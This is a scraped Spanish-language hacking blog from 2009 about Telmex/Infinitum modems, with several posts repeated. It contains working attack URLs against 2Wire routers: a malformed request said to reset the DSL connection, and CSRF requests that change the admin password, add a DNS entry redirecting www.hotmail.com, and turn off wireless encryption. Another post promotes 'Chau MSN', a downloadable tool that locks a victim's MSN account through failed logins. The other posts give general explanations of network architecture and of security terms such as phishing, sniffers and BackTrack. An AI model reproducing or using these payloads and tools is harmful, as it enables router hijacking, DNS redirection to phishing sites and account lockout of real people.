http://gateway.2wire.net/xslt?page=%&
http://gateway.2wire.net/xslt?page=%@
http://gateway.2wire.net/xslt?page=%!
http://gateway.2wire.net/xslt?page=%+
http://gateway.2wire.net/xslt?page=%;
http://gateway.2wire.net/xslt?page=%'
http://gateway.2wire.net/xslt?page=%~
http://gateway.2wire.net/xslt?page=%*
http://gateway.2wire.net/xslt?page=%0
http://gateway.2wire.net/xslt?page=%9
http://gateway.2wire.net/xslt?page=%?
etc...
Modelos Vulnerables: 1701HG, 1800HW, 2071HG, 2700HG Gateway
Software: v3.17.5, 3.7.1, 4.25.19, 5.29.51
martes, 10 de marzo de 2009
Dsl-DoS
La conexion DSL de los ruteadores 2wire se puede reiniciar con hacer una peticion a /xslt con el valor %X donde X es cualquier caracter que no es de la A-z. Ejemplo:
miércoles, 4 de marzo de 2009
Vulnerabilidades en ruteadores 2Wire (algunas versiones)
Routers Vulnerables: 1701HG, 1800HW, 2071 Gateway
Software: 3.17.5, 3.7.1, 5.29.51 Contraseña No establecida
http://www.2wire.com fue Notificado
I. Información
-------------
Son los ruteadores más populares de México y su
consola de administración web no
tiene password por defecto.
II. Vulnerabilidad
----------------
Es posible hacer que el cliente realice una petición al
ruteador y modifique
cualquier configuración.
No valida POST ni Referer ni nada.
III. "Exploit"
--------
Solo necesitamos hacer que el cliente realice alguna petición
con la configuración
que queramos.
[ejemplos]
Ponerle password (NUEVOPASS):
http://192.168.1.254/xslt?PAGE=A05_
POST&THISPAGE=A05&NEXTPAGE=A05_
POST&ENABLE_PASS=on&PASSWORD=NUEVOPASS&PASSWORD_
CONF=NUEVOPASS
Agregar un registro DNS (74.125.19.99 www.hotmail.com):
http://192.168.1.254/xslt?PAGE=J38_
SET&THISPAGE=J38&NEXTPAGE=J38_
SET&NAME=www.hotmail.com&ADDR=74.125.19.99
Deshabilitar Autenticación inalámbrica
http://192.168.1.254/xslt?PAGE=C05_
POST&THISPAGE=C05&NEXTPAGE=C05_
POST&NAME=encrypt_enabled&VALUE=0
miércoles, 18 de febrero de 2009
Toda Internet En Peligro
Alerta ------->>>>>
Toda internet en peligro, esto no es un juego, ultimamente la gente ya utiliza mas lo que es internet y gracias ha esto ha ido avanzando de un paso muy grande lo que es la inseguridad en los sistemas.
En un principo cuando empezavan los Exploits, Bugs, Errores en Sistemas etc .... etc solo afectavan directamente a sistemas Windows X.x..x.x.x..x en la actualidad ya no existe eso,,, bien es como si ubiera una falta de respeto asi algunos S.O. como lo son Linux, MacOS, Solaris etctct..
Y todo esto a quien se debe ????
bien se debe a que todos nos hemos acostubrado a internet.....
y como jala internet o que es ????
Internet es la red de REDES donde se encuentran conectadas un sin fin numero de ordenadores o PC's ,,,
Internet para que funcione Se necesita diferentes tipos de dispocitivos y protocolos .... que funcionan atraves de puertos..
En algunos dispositovos de red existen Bugs, Exploits etc.
Hoy en dia esta de moda phishing para sacar cuentas de Bancos de correos etc....
Phishing son paginas falsas..
Existen tecnicas de todo tipo para extraer informacion de la red ,///// Que medio (cables, inalambrica).
Spoofing, Sniffer, Phishing, Exploit etc.
Phishing
es un término informático que denomina un tipo de delito encuadrado dentro del ámbito de las estafas, y que se comete mediante el uso de un tipo de ingeniería social caracterizado por intentar adquirir información confidencial de forma fraudulenta (como puede ser una contraseña o información detallada sobre tarjetas de crédito u otra información bancaria). El estafador, conocido como phisher, se hace pasar por una persona o empresa de confianza en una aparente comunicación oficial electrónica, por lo común un correo electrónico, o algún sistema de mensajería instantánea[1] o incluso utilizando también llamadas telefónicas.
Phishing
En informática, un packet sniffer es un programa de captura de las tramas de red. Generalmente se usa para gestionar la red con una finalidad docente, aunque también puede ser utilizado con fines maliciosos.
Exploit
Exploit (del inglés to exploit, explotar o aprovechar) es una pieza de software, un fragmento de datos, o una secuencia de comandos que se aprovecha de un error, fallo o vulnerabilidad, a fin de causar un comportamiento no deseado o imprevisto en los programas informáticos, hardware, o algo electrónico (por lo general computarizado). Con frecuencia, esto incluye cosas tales como la violenta toma de control de un sistema de cómputo o permitir la escalada de privilegios o un ataque de denegación de servicio..
domingo, 8 de febrero de 2009
Como se da la Comunicacion -I-NFINITU-M-
El sistema por el cual nos conectamos aquellos que tenemos --I-N-F-I-N-I-T-U-M-- es un proceso muy sencillo:
vamos a dar una breve explicacion de como es el proceso de conexion para salir a internet....
en este caso escribo T-e-l-m-e-x e --I-N-F-I-N-I-T-U-M-- asi por aquello de politicas de empresa y para no tener problemas y no aparesca en google directamente o y en especial por los cops
T-e-l-m-e-x nos ofrece un modem --- ok este puede ser de diferente marca o empresa ....
existen:
-2wire (diferentes modelos)
-SpeedStream
-Thomson
-y el mas nuevo el porta retrato HUAWEI
cada uno de estos es los q nos ayudan a conectarnos a internet..... sin mas rodeos aqui un proceso de como se lleva a cabo la conexion..
PC-->MODEM-->MICRO/FILTRO-->ROCETA/TELEFONICA-->DSLAM-->ATM-->SERVIDORES/RADIUS//AAA-PUERTOS 25-587 PARA CORREOS-->ROUTER-->SERVIDORES/DNS-->ROUTER--> NUVE INTERNET
aqui cabe destacar algo muy importante como funcionan cada uno de los aparatos que se acaban de mensionar, no voy a entrar en mucha explicacion asi rapido y sencillo..
DSLAM:
Esta definicion que doy aqui no es la qu edefine exactamente el ATM pero en el caso de i-nfinutu-m es la que nos proporsiona los canales de comunicacion y la que nos asigna las velosidades de subida y la de entrada para el caso de i-nfinutu-m no da dos canales para el VPI y VCI los cules son // VPI:8 VCI:81 // VPI:8 VCI:35
SERVIDORES RADIUS
Estos servidores son los que autentifican el ususrio y el password sean correctos para utilizar la linea como acceso a internet, bueno en los modems 2wire modelos 2000 para arriba ya vienen preconfigurado para navegar en internet.. sin poner o configurar el usuario y la contrasena en el modem..
Nota: la contrasena para accesar a internet mediante un modem no es lo mismo que la WebKEY que es para accesar al modem.
SERVIDORES DE DNS:
Etos servodores son los que contienen toda la informacion sobre las ips y nombres de los host
nuestra ultima parada es --------------------------------------->>>>>>>>>>>>
NUVE DE INTERNET
emuladores de los portales de los Modems
By Mr.Anonimo
vamos a dar una breve explicacion de como es el proceso de conexion para salir a internet....
en este caso escribo T-e-l-m-e-x e --I-N-F-I-N-I-T-U-M-- asi por aquello de politicas de empresa y para no tener problemas y no aparesca en google directamente o y en especial por los cops
T-e-l-m-e-x nos ofrece un modem --- ok este puede ser de diferente marca o empresa ....
existen:
-2wire (diferentes modelos)
-SpeedStream
-Thomson
-y el mas nuevo el porta retrato HUAWEI
cada uno de estos es los q nos ayudan a conectarnos a internet..... sin mas rodeos aqui un proceso de como se lleva a cabo la conexion..
PC-->MODEM-->MICRO/FILTRO-->ROCETA/TELEFONICA-->DSLAM-->ATM-->SERVIDORES/RADIUS//AAA-PUERTOS 25-587 PARA CORREOS-->ROUTER-->SERVIDORES/DNS-->ROUTER--> NUVE INTERNET
aqui cabe destacar algo muy importante como funcionan cada uno de los aparatos que se acaban de mensionar, no voy a entrar en mucha explicacion asi rapido y sencillo..
DSLAM:
Es un multiplexor localizado en la central telefónica que proporciona a los abonados acceso a los servicios DSL sobre cable de par trenzado de cobre.El dispositivo separa la voz y los datos de las líneas de abonado.
Esta definicion que doy aqui no es la qu edefine exactamente el ATM pero en el caso de i-nfinutu-m es la que nos proporsiona los canales de comunicacion y la que nos asigna las velosidades de subida y la de entrada para el caso de i-nfinutu-m no da dos canales para el VPI y VCI los cules son // VPI:8 VCI:81 // VPI:8 VCI:35
SERVIDORES RADIUS
Estos servidores son los que autentifican el ususrio y el password sean correctos para utilizar la linea como acceso a internet, bueno en los modems 2wire modelos 2000 para arriba ya vienen preconfigurado para navegar en internet.. sin poner o configurar el usuario y la contrasena en el modem..
Nota: la contrasena para accesar a internet mediante un modem no es lo mismo que la WebKEY que es para accesar al modem.
SERVIDORES DE DNS:
Etos servodores son los que contienen toda la informacion sobre las ips y nombres de los host
nuestra ultima parada es --------------------------------------->>>>>>>>>>>>
NUVE DE INTERNET
emuladores de los portales de los Modems
By Mr.Anonimo
sábado, 7 de febrero de 2009
Chau MSN v1.0 OPEN SOURCE 14
Chau MSN es un programa creado por arhack, basado en el source de kizar, lo que hace es bloquear cuentas de msn completamente mientras el programa este activo.
Para bloquear una cuenta lo unico que tienen que hacer es colocar el msn de la victima y poner bloquear cuenta, esperar que termine de cargar todo y dejarlo abierto al programa, o minimizado. La proxima ves que la victima intente entrar al msn le saldra un cartel como este, y no podra iniciar secion:
Hay que tener en cuenta que la cuenta permanesera bloqueada mientras el programa este abierto y en el estado cuenta bloqueada.
Si se intenta bloquear una cuenta de alguien que este online, esta se bloqueara pero cuando cierre secion y vuelva a iniciarla, No hara que cierre secion.
Funcionamiento
El funcionamiento del programa es muy simple, lo que se hace es loguearse con la cuenta que se puso con passwords incorrectos, entonces el servidor de hotmail bloquea la cuenta para evitar que se realizen ataques por fuerza bruta.
ACTUALIZADO 16/04/08
Codigo fuente
Chau MSN esta programado en visual basic y es de codigo abierto desde ahora, ya libere el codigo fuente para que vean como funciona mas o menos y para todos los que quieran modificar el programa. Pueden ir haciendo las modificaciones que quieran y me lo van pasando asi voy actualizando el programa, no nesesariamente tiene que bloquear cuentas.
Les dejo una captura del VB
Descarga:
Chau MSN v1.0 (miarroba)
Chau MSN v1.0 (rapidshare)
Chau MSN v1.0 (megaupload)
Source Chau MSN v1.0 (miarroba)
Source Chau MSN v1.0 (rapidshare)
Para bloquear una cuenta lo unico que tienen que hacer es colocar el msn de la victima y poner bloquear cuenta, esperar que termine de cargar todo y dejarlo abierto al programa, o minimizado. La proxima ves que la victima intente entrar al msn le saldra un cartel como este, y no podra iniciar secion:
Hay que tener en cuenta que la cuenta permanesera bloqueada mientras el programa este abierto y en el estado cuenta bloqueada.
Si se intenta bloquear una cuenta de alguien que este online, esta se bloqueara pero cuando cierre secion y vuelva a iniciarla, No hara que cierre secion.
Funcionamiento
El funcionamiento del programa es muy simple, lo que se hace es loguearse con la cuenta que se puso con passwords incorrectos, entonces el servidor de hotmail bloquea la cuenta para evitar que se realizen ataques por fuerza bruta.
ACTUALIZADO 16/04/08
Codigo fuente
Chau MSN esta programado en visual basic y es de codigo abierto desde ahora, ya libere el codigo fuente para que vean como funciona mas o menos y para todos los que quieran modificar el programa. Pueden ir haciendo las modificaciones que quieran y me lo van pasando asi voy actualizando el programa, no nesesariamente tiene que bloquear cuentas.
Les dejo una captura del VB
Descarga:
Chau MSN v1.0 (miarroba)
Chau MSN v1.0 (rapidshare)
Chau MSN v1.0 (megaupload)
Source Chau MSN v1.0 (miarroba)
Source Chau MSN v1.0 (rapidshare)
martes, 3 de febrero de 2009
BackTrack
BackTrack es una distribución GNU/Linux en formato LiveCD pensada y diseñada para la auditoría de seguridad y relacionada con la seguridad informática en general.
Actualmente tiene una gran popularidad y aceptación en la comunidad que se mueve en torno a la seguridad informática.
Deriva de la unión de dos grandes distribuciones orientadas a la seguridad, el Auditor + WHAX.
WHAX es la evolución del Whoppix (WhiteHat Knoppix), el cual pasó a basarse en la distribución Linux SLAX en lugar de Knoppix.
Incluye larga lista de herramientas de seguridad listas para usar, entre las que destacan numerosos scanners de puertos y vulnerabilidades, archivos de exploits, sniffers, herramientas de análisis forense y herramientas para la auditoría Wireless.
Fue incluida en la famosa lista Top 100 Network Security Tools del 2006 disponible en SecTools.Org
Puede encontrarse más información en la página de Backtrack, desde donde también es posible descargarla.
Entre las muchas herramientas del backtrack, quiero resaltar el excelente soporte a tarjetas de red wireless, también tiene incluidas las herramientas para análisis de redes wireless más populares, como Kismet, Air crack, Airsnort entre otras, de hecho, la principal razón por la que me intereso el backtrack en primer lugar, fue por la posibilidad de ejecutar Wireshark, para análisis de redes wireless, ya que el soporte para estos análisis es mucho mejor en Linux y hasta el momento no me ha defraudado, lo he utilizado en un par de veces para estos propósitos con análisis sencillos sin problemas.
Modems T--e-l-m-e-x
En mexico existen varios proveedores de servicio de internet entre ellos uno muy fuerte y competente es T--e-l-m-e-x entre sus competencias existe:
-Maxcom
-Cablecom
etc. etc (Axtel)
Algo muy importante que cabe destacar en T--e-l-m-e-x son sus diferentes modems que han existido e implementado como lo son:
-SpeedStream
-2wire
--Thomson
--Huawei
Noticia: Recien salidito tambien llega el Huawei que ademas de ser router y bridge es porta Retratos.
proximamente Como configurarlos
-Maxcom
-Cablecom
etc. etc (Axtel)
Algo muy importante que cabe destacar en T--e-l-m-e-x son sus diferentes modems que han existido e implementado como lo son:
-SpeedStream
-2wire
--Thomson--Huawei
Noticia: Recien salidito tambien llega el Huawei que ademas de ser router y bridge es porta Retratos.
proximamente Como configurarlos
Suscribirse a:
Entradas (Atom)